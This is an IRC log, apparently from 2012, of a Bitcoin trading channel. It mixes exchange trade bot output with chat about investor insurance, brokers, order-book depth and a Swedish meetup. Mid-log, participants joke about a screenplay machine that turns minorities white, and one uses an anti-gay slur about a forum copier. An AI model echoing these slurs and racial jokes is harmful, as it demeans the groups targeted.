Aug 30 19:40:13 [GLBSE] [YARR] 1 @ 1 BTC [+] Aug 30 19:40:14 [GLBSE] [YARR] 2 @ 1 = 2 BTC [+] Aug 30 19:40:15 [GLBSE] [YARR] 10 @ 1 = 10 BTC [+] Aug 30 19:40:17 [GLBSE] [YARR] 74 @ 1 = 74 BTC [+] Aug 30 19:40:26 [GLBSE] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Aug 30 19:43:47 [GLBSE] [KRAKEN] 1000 @ 0.01 = 10 BTC Aug 30 19:45:59 [GLBSE] [ASICMINER] 6 @ 0.1199 = 0.7194 BTC [-] Aug 30 19:46:01 [GLBSE] [DMC] 40 @ 0.0623 = 2.492 BTC [-] Aug 30 19:50:09 [GLBSE] [ASICMINER] 37 @ 0.1071 = 3.9627 BTC [-] Aug 30 19:50:11 [GLBSE] [ASICMINER] 63 @ 0.107 = 6.741 BTC [-] Aug 30 19:51:18 [MPEX] [S.MPOE] 21200 @ 0.00038959 = 8.2593 BTC [-] Aug 30 19:51:46 [GLBSE] [ARS] 3 @ 0.0159 = 0.0477 BTC [+] Aug 30 19:52:24 [MPEX] [S.MPOE] 27692 @ 0.00038959 = 10.7885 BTC [-] Aug 30 19:52:37 hmm, so are ppt operators getting legal bs on their asses? Aug 30 19:54:07 [MPEX] [O.BTCUSD.P060T] 7 @ 0.02669781 = 0.1869 BTC [+] Aug 30 19:56:57 [GLBSE] [ASICMINER] 6 @ 0.1179 = 0.7074 BTC [+] Aug 30 19:57:20 [GLBSE] [BITCOINMINV] 31 @ 0.12001 = 3.7203 BTC [-] Aug 30 19:57:46 [GLBSE] [BITCOINMINV] 100 @ 0.12 = 12 BTC [-] Aug 30 19:58:19 [GLBSE] [BITCOINMINV] 590 @ 0.115 = 67.85 BTC [-] Aug 30 19:58:39 [GLBSE] [YABMC] 1 @ 0.1179 BTC [-] Aug 30 20:01:09 [GLBSE] [BITCOINMINV] 10 @ 0.13784 = 1.3784 BTC [+] Aug 30 20:02:32 ;;ticker Aug 30 20:02:32 Best bid: 10.763, Best ask: 10.7999, Bid-ask spread: 0.03690, Last trade: 10.8, 24 hour volume: 40575, 24 hour low: 10.6, 24 hour high: 10.98888 Aug 30 20:05:01 [GLBSE] [TEEK.B] 2 @ 0.927 = 1.854 BTC [+] Aug 30 20:05:02 [GLBSE] [TEEK.B] 11 @ 0.9299 = 10.2289 BTC [+] Aug 30 20:05:04 [GLBSE] [TEEK.B] 1 @ 0.9448 BTC [+] Aug 30 20:05:05 [GLBSE] [TEEK.B] 4 @ 0.945 = 3.78 BTC [+] Aug 30 20:05:45 [GLBSE] [TEEK.B] 1 @ 0.945 BTC [+] Aug 30 20:15:52 [GLBSE] [FPGAMINING] 6 @ 0.8299 = 4.9794 BTC [+] Aug 30 20:15:53 [GLBSE] [FPGAMINING] 54 @ 0.83 = 44.82 BTC [+] Aug 30 20:18:03 [GLBSE] [BIB.PIRATE] 16 @ 0.1 = 1.6 BTC [-] Aug 30 20:19:01 [GLBSE] [TYGRR.BOND-P] 42 @ 0.06 = 2.52 BTC [-] Aug 30 20:19:26 [GLBSE] [MOORE] 1 @ 0.5088 BTC [+] Aug 30 20:20:36 [GLBSE] [BIB.PIRATE] 14 @ 0.08 = 1.12 BTC [-] Aug 30 20:20:49 [GLBSE] [TYGRR.BOND-P] 16 @ 0.06 = 0.96 BTC [-] Aug 30 20:21:20 [GLBSE] [FOO.PPPPT] 5 @ 0.07 = 0.35 BTC [-] Aug 30 20:24:41 [GLBSE] [BIB.PIRATE] 86 @ 0.08 = 6.88 BTC [-] Aug 30 20:25:50 [GLBSE] [FOO.PPPPT] 30 @ 0.07 = 2.1 BTC [-] Aug 30 20:30:46 [GLBSE] [FOO.PPPPT] 37 @ 0.07 = 2.59 BTC [-] Aug 30 20:32:55 [MPEX] [F.GIGA.ETF] 10700 @ 0.00088603 = 9.4805 BTC [+] Aug 30 20:32:56 [MPEX] [F.GIGA.ETF] 4500 @ 0.00087952 = 3.9578 BTC [-] Aug 30 20:33:16 https://bitcointalk.org/index.php?topic=104489.msg1146869#msg1146869 Aug 30 20:36:46 [MPEX] [F.GIGA.ETF] 9023 @ 0.00089379 = 8.0647 BTC [+] Aug 30 20:36:47 [MPEX] [F.GIGA.ETF] 2634 @ 0.00089803 = 2.3654 BTC [+] Aug 30 20:36:49 [MPEX] [F.GIGA.ETF] 8843 @ 0.00090488 = 8.0019 BTC [+] Aug 30 20:38:26 usagi Aug 30 20:38:29 if you actually need those LTC Aug 30 20:38:31 i can sell em to you Aug 30 20:38:40 Hey, I got it Aug 30 20:38:48 Thanks I was just panicking because I didn't know what to do Aug 30 20:38:54 you got em already? Aug 30 20:38:55 ok Aug 30 20:39:01 i ended up buying 500 btc ^^ Aug 30 20:39:28 i mean Aug 30 20:39:30 litecoins Aug 30 20:44:58 oh usagi Aug 30 20:45:06 i've been meaning to ask Aug 30 20:45:45 i know s2cm is small beans, but we'll prolly want some kinde of insurance on the funds we place Aug 30 20:45:48 and Aug 30 20:46:26 I wouldn't say anything smickles does is small beans. You're well-respected around these parts Aug 30 20:46:45 as i'm a broker, do you offer security investor protection? Aug 30 20:46:56 or something similar Aug 30 20:47:19 You mean for your passthroughs? Aug 30 20:48:05 I'm not sure what you mean Aug 30 20:48:50 A shareholder protection agreement would protect investors in ss if the broker/dealer relationship failed Aug 30 20:49:34 usagi: well, i hold various assets on behalf of people (outside of mpoeetf and ss) Aug 30 20:49:44 suppose the exchange up and runs Aug 30 20:49:51 it would depend on what you wanted protection from. if you wanted protection from something happening wrt glbse or mpex or protection on a particular asset that would be different Aug 30 20:49:57 i should have insurance to refund my clients Aug 30 20:51:00 But if the exchange up and runs your agreement with individual companies does not change Aug 30 20:51:35 also, it should cover my clients in the even i can't perform my duties to them Aug 30 20:51:45 Brokers merely hold securities for you on your behalf Aug 30 20:51:55 Well I guess it would depend on what exchange Aug 30 20:52:04 now this is interesting. im curious how much mpex insurance costs. Aug 30 20:52:08 some exchanges are cheaper to insure than others ^^ Aug 30 20:52:18 Well, I don't have your dox mircea Aug 30 20:52:28 so I would have to hunt you down, and that could be expensive Aug 30 20:52:39 usagi lol, i'd expect the exchange which lists mostly scam assets would be VERY expensive. Aug 30 20:52:42 also, i should have coverage in the sense of protecting my clients from myself Aug 30 20:52:52 smickles that part can't be done smickles. Aug 30 20:53:02 copumpkin worked on it for a while, but it just doesn't work. Aug 30 20:53:09 I act on the information I have on my desk. Aug 30 20:53:15 ? Aug 30 20:53:20 oh, insurance? Aug 30 20:53:22 copumpkin weren't yea Aug 30 20:53:24 Some of which is priveledged to me as the guy who runs CPA Aug 30 20:53:45 yeah, I realized I didn't want to diversify coverage enough to make it work, and the legal issues with CDSes in particular were too annoying Aug 30 20:54:00 but mostly, insurance is only really worth it if you have a really wide uncorrelated portfolio of insured things Aug 30 20:54:09 wikipedia on traditional security investor protection " It protects investors in certain securities from financial harm if a broker-dealer fails. It does not protect against losses in the securities markets, identity theft, or other 3rd-party fraud." Aug 30 20:54:09 Well smickles Aug 30 20:54:16 as far as i recall the main problem was you couldn't insure against X person cause he could just buy that insurance secretly and then default Aug 30 20:54:18 The flavor of the month is the shareholder protection agreement. Aug 30 20:54:22 If an exchange bolted Aug 30 20:54:26 we could step in and cover your loss. Aug 30 20:54:31 Since it would be out of your control Aug 30 20:54:45 If you want full coverage it would depend on the amount you're covering Aug 30 20:54:51 Probably 1% a month Aug 30 20:54:52 Round number :p Aug 30 20:55:17 mircea_popescu: that was a problem, but the main issue for profit vs. risk assumed is diverfisifcation Aug 30 20:55:35 you're taking on the same risk as a lender/investor as an insurer Aug 30 20:55:35 niceword there :D Aug 30 20:55:46 it doesn't make sense for you to accept less reward than a direct investor Aug 30 20:55:52 UNLESS you can do so all over the place Aug 30 20:55:54 i guess this is true yea. Aug 30 20:55:55 usagi: alrigh then, thanks for the primer :) Aug 30 20:55:57 becasue you don't need to pony up cash up front Aug 30 20:56:03 which is what allows you to diversify like crazy Aug 30 20:56:05 Smickles; I think a much better form of insurance for a fund is nav insurance. Aug 30 20:56:22 We agree to (for example) 100 payments of 5 bitcoins a week, in return for a (say) 400 BTC line of credit. Aug 30 20:56:23 nav insurance ?! you can't possibly be offering that ?! Aug 30 20:56:41 It would indemnify your fund against short term capital loss. Aug 30 20:57:12 so the main benefit of selling investment insurance over investing directly is that you don't need to provide money, because the risk profile is identical. This lets you invest in a million different things, and assume way more liability than you're worth (ultimate leverage), which is only sane to do if your investments are uncorrelated Aug 30 20:57:16 mircea; the owner of an options exchange should know better :p Aug 30 20:57:55 I could just as well sell smickles an option to buy out his fund at a certain strike price. Aug 30 20:58:01 happens all the time. Aug 30 20:58:15 [MPEX] [F.GIGA.ETF] 11890 @ 0.00090488 = 10.759 BTC [+] Aug 30 20:58:17 [MPEX] [F.GIGA.ETF] 1410 @ 0.0009075 = 1.2796 BTC [+] Aug 30 20:58:30 BTW we have sold a few options contracts and paid out on one already Aug 30 20:58:38 we bought 1,000 shares of BMMO at .145 back when it was 0.08 Aug 30 20:58:38 how exactly do you evaluate the volatility of a stock that existed for less than a year ? Aug 30 20:58:55 me or usagi? Aug 30 20:59:01 usagi Aug 30 20:59:09 mircea_popescu; That practice is known as "ratemaking" in the insurance biz, mircea Aug 30 20:59:21 it's not so complex but requires a detailed analysis. Aug 30 20:59:21 i'm in awe of the irresponsible stuff that passes for finance. Aug 30 20:59:30 usagi you're on very shaky ground here. Aug 30 20:59:38 Well it looks irresponsible but you really don't know anything about it. Aug 30 20:59:44 o yea ? Aug 30 20:59:51 It's actually backed up on some very interesting statistics Aug 30 20:59:54 i see. Aug 30 21:00:05 so let's see, mpoe.etf is a fund that's worth ~1800 btc atm ? Aug 30 21:00:07 copumpkin just said half of it Aug 30 21:00:15 how much does it cost me to buy 1800 of btc insurance agaisnt their nav ? Aug 30 21:00:43 So you wanna short them. Aug 30 21:00:51 ? Aug 30 21:01:14 no, i just want to show you that you're irresponsible. you sell me the insurance, i go put a block of 50mn shares of my own stock at half the current implied price and i've taken you out. Aug 30 21:01:24 please learn your fuckinglessons from the pirate fiasco. Aug 30 21:01:26 Lol Aug 30 21:01:35 lesson number one is that if you think you know more finance than me you're an idiot. Aug 30 21:01:49 You're not very smart. Aug 30 21:01:55 lesson number two is that you don't go by what you read in some wikipedia article about what happens irl. Aug 30 21:01:58 that's not how finance works. Aug 30 21:02:05 [MPEX] [F.GIGA.ETF] 490 @ 0.0009075 = 0.4447 BTC [+] Aug 30 21:02:06 [MPEX] [F.GIGA.ETF] 4710 @ 0.0009155 = 4.312 BTC [+] Aug 30 21:02:29 You are getting agitated because I run an insurance company. That's it. You need to relax. Aug 30 21:02:46 All in all we completely broke even on pirate Aug 30 21:02:48 why do people do this ?! Aug 30 21:02:51 it boggles. Aug 30 21:02:58 Even after I pay out the last 1100 coin contract remaining Aug 30 21:03:07 [GLBSE] [GERBITIN.PYRA] 50 @ 0.9 = 45 BTC [-] Aug 30 21:03:53 okay usagi, i have a couple thousand if you need em Aug 30 21:04:02 i usually dont sell til i get to around 8500 Aug 30 21:04:06 but difficulty has gone up so much Aug 30 21:04:11 8500 used to be 1/2 week Aug 30 21:04:13 now its like 3.5 Aug 30 21:04:28 rg thanks I am planning to buy them off you for my hot new killer app soon Aug 30 21:04:44 I could buy as many as 5000 Aug 30 21:04:46 sure hopefully ill have more by then Aug 30 21:04:52 you could buy off chang too Aug 30 21:04:56 chang has a shitload of ltc Aug 30 21:04:59 way more than me Aug 30 21:05:10 ouch. Aug 30 21:05:22 hehe Aug 30 21:05:29 I have a plan for that soon Aug 30 21:05:41 http://www.encyclopediabitcoinica.com/wiki/Main:Current_events Aug 30 21:05:44 One I finish my new interactive fiction masterpeice! Aug 30 21:05:56 i wrote a screenplay about bitcoin Aug 30 21:05:59 once* Aug 30 21:06:07 i never let anyone read it tho Aug 30 21:06:24 basically the US collapses and joins the european union Aug 30 21:06:33 and the underground citizens start using bitcoin Aug 30 21:06:41 to avoid being tracked/taxed by the govt Aug 30 21:07:08 cause the EU has turned into a fourth reicht type thing Aug 30 21:07:11 its ... not very good Aug 30 21:07:24 needs more desu. Aug 30 21:07:30 its just not an original idea Aug 30 21:07:42 I have an idea Aug 30 21:07:43 Canada ends up nuking the EU Aug 30 21:07:47 (spoiler alert) Aug 30 21:07:54 You could have the EU flee to the moon Aug 30 21:07:55 lol Aug 30 21:08:03 is this endoftheworld.swf ? Aug 30 21:08:04 and build a moon base, and then 50 years later come back and invade Aug 30 21:08:07 the canadian union is umm Aug 30 21:08:13 iceland, canada, and alask Aug 30 21:08:15 a Aug 30 21:08:19 its been a while since i read it Aug 30 21:08:24 (if you are not familliar http://www.endofworld.net/ ) Aug 30 21:08:27 And during this time madagascar has become the center of world trade and finace. Aug 30 21:08:40 in my screen play Aug 30 21:08:44 all the african countries get renamed Aug 30 21:08:46 to european names Aug 30 21:09:06 OH i forgot the best part Aug 30 21:09:14 the fourth reicht, they dont kill minorities Aug 30 21:09:18 they have a machine that turns themwhite Aug 30 21:09:25 lol Aug 30 21:09:42 and all the characters in the book are IRC people Aug 30 21:09:47 vragnaroda is in it Aug 30 21:09:53 nanotube is in it Aug 30 21:10:02 mircea_popescu is the nigerian ambassador Aug 30 21:10:06 nigera aka Denmark2 Aug 30 21:10:17 we start filming in a month Aug 30 21:10:19 o i can has ambassador sahs ? Aug 30 21:20:56 [MPEX] [F.GIGA.ETF] 13800 @ 0.00089791 = 12.3912 BTC [-] Aug 30 21:21:57 [MPEX] [S.MPOE] 1426 @ 0.00038888 = 0.5545 BTC [-] Aug 30 21:22:39 [MPEX] [S.MPOE] 18964 @ 0.00038888 = 7.3747 BTC [-] Aug 30 21:26:05 [MPEX] [F.GIGA.ETF] 7900 @ 0.00089791 = 7.0935 BTC [-] Aug 30 21:29:35 [GLBSE] [TYGRR.BOND-P] 8 @ 0.06 = 0.48 BTC [-] Aug 30 21:39:39 hey guys Aug 30 21:39:43 who is payb.tc in irc? Aug 30 21:39:46 do he use irc? Aug 30 21:39:51 anyone know anything about him ? Aug 30 21:40:05 [GLBSE] [ASICMINER] 8 @ 0.1102 = 0.8816 BTC [-] Aug 30 21:40:06 [GLBSE] [ASICMINER] 9 @ 0.1101 = 0.9909 BTC [-] Aug 30 21:40:07 [GLBSE] [ASICMINER] 36 @ 0.1101 = 3.9636 BTC [-] Aug 30 21:40:08 [GLBSE] [ASICMINER] 7 @ 0.11 = 0.77 BTC [-] Aug 30 21:42:14 NOPE Aug 30 21:42:16 ;;ticker Aug 30 21:42:16 Best bid: 10.75001, Best ask: 10.76998, Bid-ask spread: 0.01997, Last trade: 10.8, 24 hour volume: 37351, 24 hour low: 10.6, 24 hour high: 10.93199 Aug 30 21:42:24 Still on 10.75 Aug 30 21:42:28 what a load of bollocks Aug 30 21:42:43 [GLBSE] [KRAKEN] 65 @ 0.01 = 0.65 BTC Aug 30 21:42:43 buy some, it'll go up higher Aug 30 21:43:08 ;;market buy 50000 Aug 30 21:43:10 A market order to buy 50000 bitcoins right now would take 577471.3123 USD and would take the last price up to 12.2157 USD, resulting in an average price of 11.5494 USD/BTC. Aug 30 21:43:20 ;;market buy 100000 Aug 30 21:43:22 A market order to buy 100000 bitcoins right now would take 1265845.2707 USD and would take the last price up to 15.0000 USD, resulting in an average price of 12.6585 USD/BTC. Aug 30 21:43:30 ;;market buy 200000 Aug 30 21:43:31 This order would exceed the size of the order book. You would buy 150447.71 bitcoins, for a total of 1112962330.6030 USD and take the price to 1000000000.0000. Aug 30 21:43:38 I could live iwth that Aug 30 21:43:39 with Aug 30 21:43:49 ;;market buy 150000 Aug 30 21:43:51 A market order to buy 150000 bitcoins right now would take 43206514.1319 USD and would take the last price up to 100000.0000 USD, resulting in an average price of 288.0434 USD/BTC. Aug 30 21:43:56 lol Aug 30 21:43:58 do it! Aug 30 21:47:51 lol ya Aug 30 21:47:58 do it. do it. Aug 30 21:51:34 [GLBSE] [TYGRR.BOND-P] 30 @ 0.1 = 3 BTC [+] Aug 30 21:51:36 [GLBSE] [TYGRR.BOND-P] 5 @ 0.1 = 0.5 BTC [+] Aug 30 21:52:33 ;;market buy 120000 Aug 30 21:52:35 A market order to buy 120000 bitcoins right now would take 1575702.1023 USD and would take the last price up to 17.5900 USD, resulting in an average price of 13.1309 USD/BTC. Aug 30 21:52:41 ;;market buy 130000 Aug 30 21:52:43 A market order to buy 130000 bitcoins right now would take 1768377.5390 USD and would take the last price up to 20.0000 USD, resulting in an average price of 13.6029 USD/BTC. Aug 30 21:52:57 ;;market buy 140000 Aug 30 21:52:58 A market order to buy 140000 bitcoins right now would take 2019344.0324 USD and would take the last price up to 30.0000 USD, resulting in an average price of 14.4239 USD/BTC. Aug 30 21:53:24 So you could buy up to $30 at a $14 average Aug 30 21:53:31 Sell them at $30 if possible Aug 30 21:53:42 and profit even if it goes down a little Aug 30 21:54:08 [GLBSE] [TYGRR.BOND-P] 40 @ 0.11 = 4.4 BTC [+] Aug 30 21:55:22 ;;market sell 50000 Aug 30 21:55:24 A market order to sell 50000 bitcoins right now would net 486057.6760 USD and would take the last price down to 9.0000 USD, resulting in an average price of 9.7212 USD/BTC. Aug 30 21:55:55 ;;market sell 500000 Aug 30 21:55:57 A market order to sell 500000 bitcoins right now would net 1969654.2931 USD and would take the last price down to 1.1500 USD, resulting in an average price of 3.9393 USD/BTC. Aug 30 21:56:13 [GLBSE] [GMVT-BOT] 3 @ 0.1785 = 0.5355 BTC [+] Aug 30 21:57:24 Anybody have GMVT-BOT to lend out? Aug 30 21:57:38 [GLBSE] [FPGA.CONTRACT] 1 @ 0.09 BTC [+] Aug 30 21:57:39 Wolf_L these things aren't very accurate you know. more orders would spring up Aug 30 21:58:15 True. The exchange is too slow. Aug 30 22:01:23 [GLBSE] [UDN] 1 @ 0.10099999 BTC [+] Aug 30 22:03:04 [GLBSE] [FOO.PPPPT] 101 @ 0.08 = 8.08 BTC [+] Aug 30 22:07:39 [MPEX] [F.GIGA.ETF] 1540 @ 0.00089351 = 1.376 BTC [-] Aug 30 22:09:28 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [+] Aug 30 22:10:10 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [+] Aug 30 22:25:52 http://blockchain.info/charts/output-volume :) Aug 30 22:26:00 some serious coin moving is happening Aug 30 22:26:15 [GLBSE] [BTC-MINING] 1 @ 0.9 BTC [-] Aug 30 22:27:12 wow Aug 30 22:27:33 i think we're on the cusp of bubble v2 Aug 30 22:27:57 EskimoBob that's mostly satoshi dice. Aug 30 22:28:36 its not nb of tx Aug 30 22:28:39 but its volume Aug 30 22:29:10 i dont think its sd Aug 30 22:29:40 thing with transactions is Aug 30 22:29:47 if i move 5 btc out of a wallet with 5000 btc in it Aug 30 22:29:52 you might very well see 5000 btc move. Aug 30 22:30:11 4995 of them to another address of mine. Aug 30 22:30:21 yes Aug 30 22:30:37 but those spikes should be conusmed Aug 30 22:30:42 by share volume of small tx Aug 30 22:30:48 this is bigger. Aug 30 22:31:12 hmm. maybe. Aug 30 22:32:04 http://blockchain.info/charts/n-transactions Aug 30 22:32:10 the ntransactions is moving in step. Aug 30 22:32:26 or maybe not. Aug 30 22:32:31 hm Aug 30 22:32:34 if we compare those two Aug 30 22:32:44 we can see something has changed in the output size Aug 30 22:33:06 http://blockchain.info/charts/blocks-size haha this is a dfunny one. Aug 30 22:33:21 mircea_popescu: why 20btc? Aug 30 22:33:24 why why why why why Aug 30 22:33:25 almost like global warmings hockey stick Aug 30 22:33:33 Anduck sorry ? Aug 30 22:33:45 mircea_popescu: 20btc to register my gpg in mpex Aug 30 22:33:49 o o Aug 30 22:33:58 you should use my refferal Aug 30 22:33:59 well... i like money. Aug 30 22:33:59 or something Aug 30 22:34:01 :> Aug 30 22:34:07 kakobrekla what it is? Aug 30 22:34:13 sec Aug 30 22:34:32 27AF75321F2489E8 Aug 30 22:34:40 key id is what mp needs afaik Aug 30 22:34:42 nah you need the whole keyid Aug 30 22:34:53 well, http://bitcoin-otc.com/viewgpg.php?nick=kakobrekla Aug 30 22:34:59 i mean, fingerprint Aug 30 22:35:02 not keyid sorry Aug 30 22:35:09 what do i do with this ? Aug 30 22:35:14 dunno :D Aug 30 22:35:30 i think just notify mp Aug 30 22:36:37 Anduck when you send your key via email mention it. Aug 30 22:36:50 [GLBSE] [GIGAMINING] 1 @ 0.869999 BTC [-] Aug 30 22:37:19 mircea_popescu: i am not intending on paying over 200 USD to use your system, still. Aug 30 22:37:30 i prefer GLBSE or similar Aug 30 22:37:36 that's fine. Aug 30 22:37:38 i would use MPEX if it wasnt that 20btc price lol Aug 30 22:37:58 its just waste to pay 20btc to buy shares worth of 10 btc Aug 30 22:38:08 hm Aug 30 22:38:09 kakobrekla http://polimedia.us/bitcoin/faq.html#13 for later reference. Aug 30 22:38:16 yeah Aug 30 22:38:26 Anduck, use my ref. and get 2.5 btc back :D Aug 30 22:38:27 Anduck yeah, if you're doing that sort of volume it's prolly not worth your while. Aug 30 22:38:48 any info how can i buy the stock i want? Aug 30 22:38:54 without making acc in mpex? Aug 30 22:39:05 you could use a broker Aug 30 22:39:13 such as glbse, or otherwise smickles, brendio, scl. Aug 30 22:39:17 i think there's more. Aug 30 22:39:46 how do these brokers maintain my shares? Aug 30 22:40:04 well you'd have to ask them, wouldn't you ? i think they keep spreadsheets mostly. Aug 30 22:40:48 k Aug 30 22:40:59 and they pay dividends like a passthrough Aug 30 22:41:00 ? Aug 30 22:41:12 well ya Aug 30 22:41:43 k Aug 30 22:42:09 [GLBSE] [TYGRR.BOT] 3 @ 0.91 = 2.73 BTC [+] Aug 30 22:42:27 http://www.encyclopediabitcoinica.com/wiki/Bruce_Fagner Aug 30 22:44:32 lolz Aug 30 22:44:46 Please note that in all e-mails from Liberty Reserve we will: Always address you by your first name. Aug 30 22:44:48 suych bs. Aug 30 22:48:08 chmod755 re RapeHill > did they ever reinburse the users ? dja know ? Aug 30 22:48:20 mircea_popescu: i have no idea Aug 30 22:48:34 it's so odd how that dissapeared from the radar. Aug 30 22:48:50 they were gonna sue dwolla and all... dwolla didn't seem to think much of it... the end ? Aug 30 22:50:53 clickin @ random page Aug 30 22:50:55 http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Aug 30 22:51:03 lol Aug 30 22:51:22 i just realised that http://brucewagner.com/forum/index.php is practically an exact copy of http://polimedia.us/btcf/index.php Aug 30 22:51:25 the fag stole my forum! Aug 30 22:51:40 lol Aug 30 22:52:07 we should have a fag, where's my forum! reality tv show Aug 30 22:56:11 ;;ticker Aug 30 22:56:13 Best bid: 10.792, Best ask: 10.8358, Bid-ask spread: 0.04380, Last trade: 10.8358, 24 hour volume: 31470, 24 hour low: 10.6, 24 hour high: 10.93199 Aug 30 22:56:27 [GLBSE] [HYDRO.BONDS] 2 @ 1.5601 = 3.1202 BTC [-] Aug 30 22:56:29 [GLBSE] [HYDRO.BONDS] 3 @ 1.56 = 4.68 BTC [-] Aug 30 22:57:16 [GLBSE] [NASTY] 2 @ 0.52 = 1.04 BTC [+] Aug 30 22:58:05 [GLBSE] [PUREMINING] 1 @ 0.093 BTC [-] Aug 30 22:59:55 [GLBSE] [NASTY] 2 @ 0.529 = 1.058 BTC [+] Aug 30 23:00:29 [GLBSE] [PUREMINING] 10 @ 0.0939 = 0.939 BTC [+] Aug 30 23:04:10 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [+] Aug 30 23:04:53 [GLBSE] [PUREMINING] 28 @ 0.09389 = 2.6289 BTC [-] Aug 30 23:05:37 [GLBSE] [SILVER] 3 @ 0.0095 = 0.0285 BTC [-] Aug 30 23:06:08 [GLBSE] [OBSI.HRPT] 32 @ 0.103999 = 3.328 BTC [-] Aug 30 23:06:09 [GLBSE] [OBSI.HRPT] 58 @ 0.104 = 6.032 BTC [+] Aug 30 23:12:47 [GLBSE] [OBSI.HRPT] 20 @ 0.104 = 2.08 BTC [+] Aug 30 23:13:00 [GLBSE] [OBSI.HRPT] 2 @ 0.104 = 0.208 BTC [+] Aug 30 23:17:30 [GLBSE] [NASTY] 5 @ 0.52 = 2.6 BTC [-] Aug 30 23:17:32 [GLBSE] [NASTY] 3 @ 0.53 = 1.59 BTC [+] Aug 30 23:19:48 [GLBSE] [PUREMINING] 40 @ 0.09389 = 3.7556 BTC [-] Aug 30 23:21:05 [GLBSE] [OBSI.HRPT] 5 @ 0.104 = 0.52 BTC [+] Aug 30 23:21:16 [GLBSE] [NASTY] 1 @ 0.5299 BTC [-] Aug 30 23:23:41 [GLBSE] [PUREMINING] 5 @ 0.09399 = 0.47 BTC [+] Aug 30 23:25:31 Join the first ever Swedish Bitcoin meetup in Stockholm now on Saturday! https://bitcointalk.org/index.php?topic=83329.0 Aug 30 23:25:48 I am going :D Aug 30 23:32:17 dammit, that's too far for me Aug 30 23:32:55 [MPEX] [S.MPOE] 36136 @ 0.00039215 = 14.1707 BTC [+] Aug 30 23:32:56 [MPEX] [S.MPOE] 14064 @ 0.00039203 = 5.5135 BTC [-] Aug 30 23:36:52 [GLBSE] [GSDPT] 2000 @ 0.0031 = 6.2 BTC [-] Aug 30 23:37:15 i dont think i could get to stockholm by sat if i started right now. Aug 30 23:40:05 [GLBSE] [OBSI.ABMO] 7 @ 0.07999999 = 0.56 BTC [+] Aug 30 23:44:29 [GLBSE] [TYGRR.BOND-P] 14 @ 0.10001337 = 1.4002 BTC [-] Aug 30 23:44:31 [GLBSE] [TYGRR.BOND-P] 25 @ 0.10001337 = 2.5003 BTC [-] Aug 30 23:44:31 [GLBSE] [TYGRR.BOND-P] 72 @ 0.1 = 7.2 BTC [-] Aug 30 23:46:07 [GLBSE] [BDK.BND] 10 @ 0.1015 = 1.015 BTC [+] Aug 30 23:46:46 Too bad :( Aug 30 23:46:56 Though 20 people are coming so far :D that's good :P Aug 30 23:47:04 I barely know any Bitcoineers that are swedes Aug 30 23:49:57 i thought sweden is overrepresented tbh Aug 30 23:50:06 more bitcoiners from there than you'd expect based on populatyion Aug 30 23:50:51 That might be true but I mean Swedes are always in the front of technology :P Aug 30 23:50:58 orly :D Aug 30 23:54:23 Haha I might be bias ^^ xD Aug 30 23:54:43 [GLBSE] [PUREMINING] 1 @ 0.093 BTC [-] Aug 31 00:02:46 [GLBSE] [FPGA.CONTRACT] 3 @ 0.08 = 0.24 BTC [-] Aug 31 00:03:32 [GLBSE] [BIB.BVPS] 1 @ 0.0035 BTC [-] Aug 31 00:05:00 [GLBSE] [OBSI.HRPT] 16 @ 0.104 = 1.664 BTC [+] Aug 31 00:07:34 [GLBSE] [GIGAMINING] 1 @ 0.83211 BTC [-] Aug 31 00:07:41 [GLBSE] [BITBOND] 7 @ 0.4642 = 3.2494 BTC [+] Aug 31 00:07:43 [GLBSE] [BITBOND] 9 @ 0.4643 = 4.1787 BTC [+] Aug 31 00:07:44 [GLBSE] [BITBOND] 32 @ 0.464397 = 14.8607 BTC [+] Aug 31 00:07:44 [GLBSE] [BITBOND] 83 @ 0.464398 = 38.545 BTC [+] Aug 31 00:07:46 [GLBSE] [BITBOND] 10 @ 0.464398 = 4.644 BTC [+] Aug 31 00:07:47 [GLBSE] [BITBOND] 150 @ 0.464499 = 69.6749 BTC [+] Aug 31 00:07:48 [GLBSE] [BITBOND] 5 @ 0.46798 = 2.3399 BTC [+] Aug 31 00:07:49 [GLBSE] [BITBOND] 61 @ 0.4694 = 28.6334 BTC [+] Aug 31 00:07:50 [GLBSE] [BITBOND] 6 @ 0.47 = 2.82 BTC [+] Aug 31 00:08:29 [GLBSE] [BITBOND] 10 @ 0.465 = 4.65 BTC [-] Aug 31 00:08:52 [GLBSE] [BITBOND] 7 @ 0.47 = 3.29 BTC [+] Aug 31 00:10:26 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [+] Aug 31 00:15:25 [GLBSE] [OBSI.HRPT] 23 @ 0.104 = 2.392 BTC [+] Aug 31 00:16:37 [GLBSE] [GIGAMINING] 6 @ 0.83211 = 4.9927 BTC [-] Aug 31 00:16:38 [GLBSE] [GIGAMINING] 5 @ 0.83201 = 4.1601 BTC [-] Aug 31 00:16:39 [GLBSE] [GIGAMINING] 1 @ 0.832 BTC [-] Aug 31 00:16:41 [GLBSE] [GIGAMINING] 1 @ 0.831 BTC [-] Aug 31 00:16:42 [GLBSE] [GIGAMINING] 50 @ 0.83011 = 41.5055 BTC [-] Aug 31 00:16:43 [GLBSE] [GIGAMINING] 5 @ 0.82 = 4.1 BTC [-] Aug 31 00:16:44 [GLBSE] [GIGAMINING] 100 @ 0.82 = 82 BTC [-] Aug 31 00:17:28 [MPEX] [F.GIGA.ETF] 534 @ 0.00087952 = 0.4697 BTC [-] Aug 31 00:17:29 [MPEX] [F.GIGA.ETF] 5757 @ 0.00086483 = 4.9788 BTC [-] Aug 31 00:17:31 [MPEX] [F.GIGA.ETF] 11800 @ 0.00085871 = 10.1328 BTC [-] Aug 31 00:17:31 [MPEX] [F.GIGA.ETF] 14763 @ 0.00085773 = 12.6627 BTC [-] Aug 31 00:17:32 [MPEX] [F.GIGA.ETF] 12518 @ 0.00085675 = 10.7248 BTC [-] Aug 31 00:17:33 [MPEX] [F.GIGA.ETF] 2106 @ 0.00084605 = 1.7818 BTC [-] Aug 31 00:17:34 [MPEX] [F.GIGA.ETF] 1522 @ 0.00084539 = 1.2867 BTC [-] Aug 31 00:18:05 [MPEX] [F.GIGA.ETF] 3179 @ 0.00084539 = 2.6875 BTC [-] Aug 31 00:18:06 [MPEX] [F.GIGA.ETF] 14600 @ 0.00084171 = 12.289 BTC [-] Aug 31 00:18:08 [MPEX] [F.GIGA.ETF] 9221 @ 0.00082845 = 7.6391 BTC [-] Aug 31 